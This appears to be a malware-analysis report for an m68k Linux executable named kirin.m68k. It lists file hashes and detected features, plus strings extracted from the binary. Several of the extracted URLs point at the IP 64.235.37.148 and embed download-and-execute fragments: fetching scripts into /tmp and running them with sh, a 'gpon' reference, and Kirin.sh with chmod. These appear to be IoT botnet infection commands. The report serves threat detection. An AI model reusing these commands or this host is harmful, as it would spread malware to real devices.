kirin.m68k
First submission 2024-10-18 00:29:02
File details
File type: | ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped |
Mime type: | application/x-executable |
File size: | 127.5 KB (130556 bytes) |
MD5: | 42156413e13c350128628eac58175a7c |
SHA1: | cf68c0016711cb124c8fa81d065d1998efb9c13f |
SHA256: | 52814d35e49682fcb28106c8a84fcf3a83181f58c68ba91501b0de8213fa501f |
File features detected
Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR
URLs, FQDN and IP indicators 1
Strings analysis - Possible IPs found 7
1.9.2.6 |
1.9.2.4 |
1.8.1.11 |
1.9.0.8 |
64.235.37.148 |
8.8.8.8 |
1.9.0.6 |
Strings analysis - Possible URLs found 6
http://64.235.37.148/gpon+-O+/tmp/gaf;sh+/tmp/gaf |
http://64.235.37.148/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ |
http://64.235.37.148/real.sh |
http://schemas.xmlsoap.org/soap/envelope/ |
http://schemas.xmlsoap.org/soap/encoding/ |
http://64.235.37.148/Kirin.sh;chmod |